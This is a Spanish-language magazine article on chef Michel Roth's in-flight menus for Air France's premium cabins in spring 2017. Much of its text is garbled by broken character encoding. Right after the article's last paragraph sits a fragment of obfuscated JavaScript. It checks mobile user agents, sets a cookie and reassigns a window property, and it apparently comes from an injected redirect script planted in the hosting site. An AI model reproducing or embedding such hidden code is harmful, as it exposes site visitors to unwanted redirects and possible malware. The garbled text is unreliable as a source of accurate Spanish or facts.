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Alta cocina en las alturas

La buena cocina francesa no solo se puede disfrutar sentados en un lujoso restaurante frente a una romA?ntica plaza enAi??ParAi??s o dentro de un palaciego hotel. Ahora, esta gastronomAi??a reconocida internacionalmente tambiAi??n se puede degustar desde las alturas, puesAi??desde 2009 la aerolAi??nea Air France colabora con reconocidos chefs para elaborar sus menA?s, para la Business Class y La PremiA?re, en los vuelos que salen desde ParAi??s.

Para el menA? de abril a junio de 2017, el turno le corresponde a Michel Roth, uno de los chefs mA?s galardonados de Francia, cuya cocina, como Ai??l mismo ha definido, es una mezcla de modernidad y clasicismo. Roth ha recibido los premiosAi??ai???Bocuse d’orai??? y ai???Meilleur Ouvrier de Franceai??? (mejor profesional francAi??s en su categorAi??a) en 1991. TambiAi??n ha sidoAi??nombrado Caballero de la LegiA?n de Honor en 2006, tiene varias estrellas Michelin y recibiA? el galardA?n ai???Romandai??? del aAi??o(en 2016) con una puntuaciA?n de 18/20 en la guAi??a de restaurantes Gault & Millau.

Roth preparando el jarrete de ternera con limonaria y fricasAi?? de verduras variadas, uno de los platillos del menA? de Air France.

Roth, quien ha trabajado junto a las casas mA?s prestigiosas como Lai??i??Espadon, del Hotel Ritz, o el gran Hotel President Wilson en Ginebra, Suiza, donde tiene su actual restaurante Bayview, ha creado para la aerolAi??nea un menA? que se renovarA? cada mes con dos nuevos platos. Un ave laqueada con pimientas exA?ticas y miel de cAi??tricos, piAi??a y mango caramelizados, y bastones de verduras,Ai??serA? uno de los platillos disponibles en el mes de mayo.

Para junio, se incluirA?n el jarrete de ternera con limonaria y fricasAi?? de verduras variadas, al igual que los camarones a la plancha, salsa ai???Homardineai??i?? perfumada con estragA?n, arroz rojo, brotes de espinacas y setas ostra.

Con estas seis creaciones culinarias, Michel RothAi??pone de relieve los productos regionales y se atreve a elaborar inesperadas fusiones, demostrando su dominio tAi??cnico al combinar de forma equilibrada, la tradiciA?n gastronA?mica francesa y la modernidad. Esta es la manera de expresar su sueAi??o como chef: hacer feliz a la gente por medio de su cocina, tanto en tierra firme como en el aire. |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Karen Bernal:
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